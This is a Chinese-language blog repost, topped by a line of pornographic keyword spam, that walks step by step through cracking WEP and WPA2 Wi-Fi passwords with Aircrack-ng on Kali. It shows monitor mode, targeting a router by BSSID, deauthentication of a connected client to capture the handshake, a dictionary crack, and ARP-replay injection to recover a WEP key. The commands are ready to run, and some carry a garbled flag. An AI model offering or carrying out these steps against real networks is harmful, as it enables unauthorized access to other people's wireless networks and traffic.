日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

kali使用Aircrack-ng破解WEP、WPA的WIFI密码教程

發(fā)布時(shí)間:2023/12/16 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 kali使用Aircrack-ng破解WEP、WPA的WIFI密码教程 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

kali使用Aircrack-ng破解WEP、WPA的WIFI密碼教程

注意:需要擁有可以監(jiān)聽的網(wǎng)卡,本人在淘寶購(gòu)買。

1.在VMware虛擬機(jī)上安裝kali

這里直接推薦別人寫的博客

2.開啟網(wǎng)卡監(jiān)聽

首先右鍵打開終端

輸入以下代碼提升權(quán)限

sudo su

并且輸入密碼,注意這里的密碼在安裝kali時(shí)設(shè)置過,按照上面的參考教程來密碼應(yīng)該是kali

查看你的網(wǎng)卡

airmon-ng

出現(xiàn)一下內(nèi)容則是找到了你的網(wǎng)卡

如果沒找到,請(qǐng)查看你的虛擬機(jī)是否連接了網(wǎng)卡,操作如下,找到你的網(wǎng)卡那一項(xiàng),點(diǎn)擊連接即可。這里我的網(wǎng)卡是wlan0


下面開啟網(wǎng)卡的監(jiān)聽模式

airmon-ng start wlan0

這里的wlan0是剛剛找到的網(wǎng)卡的接口名


此時(shí)再次使用airmon-ng命令進(jìn)行查看可以發(fā)現(xiàn)接口名稱已經(jīng)變成了wlan0mon

3.WiFi破解——WPA2為例

第一步掃描WiFi

airodump-ng wlan0mon


這里我們選擇這個(gè)名叫MERCURY_60B3的網(wǎng)絡(luò)進(jìn)行破解
注意這里的幾個(gè)參數(shù),BSSID下面的是要破的路由器的MAC地址,CH是信道
找到以后我們先ctrlC退出進(jìn)程,這樣就可以復(fù)制上面的地址了
輸入以下命令

airodump-ng -w abc -c 12 --bssid 90:76:9F:A1:60:B3 wlan0mon -ignore-nefative-oneaa


這里-c后面的是前面選擇的目標(biāo)WIFI的信道,–bssid后面是路由器的MAC地址,station是用戶的MAC地址
-w abc 表示后面抓包會(huì)用abc命名這個(gè)你可以隨便打都行
這離我們能監(jiān)聽到這個(gè)wifi有一個(gè)用戶正在使用,沒有用戶使用的WiFi是無法破解的,建議先ctrlC一下,把紅色框框里的BBSID和STATION下面的地址復(fù)制到其他地方備用

下面進(jìn)行抓包
這里首先上面的那個(gè)airodump-ng -w abc -c 12 --bssid 90:76:9F:A1:60:B3 wlan0mon -ignore-nefative-oneaa
命令要在運(yùn)行著,剛剛ctrlC去復(fù)制地址需要重新打一遍
重啟一個(gè)新的終端窗口,申請(qǐng)管理員權(quán)限sudo su,密碼默認(rèn):kali
輸入如下的指令

aireplay-ng -0 2 -a 90:76:9F:A1:60:B3 -c D8:B0:53:7F:2B:B8 wlan0mon

這里的兩個(gè)地址就是上面的那倆地址

此時(shí)我們可以在第一個(gè)終端里面看到WPA handshak字樣,則說明抓包成功

此時(shí)按ctrlC退出抓包,可以發(fā)現(xiàn)桌面上有這樣的.ivs

這是WiFi密碼字典

重新開啟一個(gè)終端進(jìn)行破解

aircrack-ng -w wifi.txt abc-*.ivs

前面的字典,后面的是.ivs文件名

便可以破解成功,這里由于我的wifi密碼過于簡(jiǎn)單,一下就成功了,如果比較復(fù)雜,或者字典太小,也許跑不出來

3.WiFi破解——WEP為例

第一步掃描WiFi

airodump-ng wlan0mon

這里我們選擇WEP網(wǎng)絡(luò)進(jìn)行破解

輸入如下命令進(jìn)行抓包

airodump-ng -w 123 -c 13 --bssid 74:7D:24:AC:83:C0 wlan0mon -ignore-nefative-oneaa

這里-c后面的是前面選擇的目標(biāo)WIFI的信道,–bssid后面是路由器的MAC地址,station是用戶的MAC地址
-w abc 表示后面抓包會(huì)用abc命名這個(gè)你可以隨便打都行
這離我們能監(jiān)聽到這個(gè)wifi有一個(gè)用戶正在使用,沒有用戶使用的WiFi是無法破解的

然后我們重啟一個(gè)新的終端,提升權(quán)限后輸入以下指令

aireplay-ng -3 -b 74:7D:24:AC:83:C0 -h D8:B0:53:7F:2B:B8 wlan0mon

-3 指采用ARPRequesr注入攻擊模式,
這里的-b后面是BSSID,-h后面是STATON地址,
可以看到正在讀取無線數(shù)據(jù)報(bào)文,從中獲取ARP報(bào)文

在等待之后,一但成功截獲到ARP請(qǐng)求報(bào)文,我們將會(huì)看到大量ARP報(bào)文快速交互的情況出現(xiàn)

可以看到數(shù)據(jù)量很大
我們可以在桌面看到123-01.ivs的包

下面再開啟一個(gè)新終端,同樣提升權(quán)限后
輸入如下命令開始計(jì)算

aircrack-ng 123-*.ivs


注意:在抓取的無線數(shù)據(jù)報(bào)文達(dá)到了一定數(shù)量后,一般都是指IVs值達(dá)到2萬以上時(shí),就可以開始破解,若不能成功就等待數(shù)據(jù)報(bào)文的繼續(xù)抓取然后多試幾次。
出現(xiàn)如下顯示則表示破解成功!


其中的(ASCII: WEPAttackTest )就是密碼
最后附上其他人寫的相關(guān)博客
WPA2
WEP
這里面有更加詳細(xì)的原理展示

總結(jié)

以上是生活随笔為你收集整理的kali使用Aircrack-ng破解WEP、WPA的WIFI密码教程的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。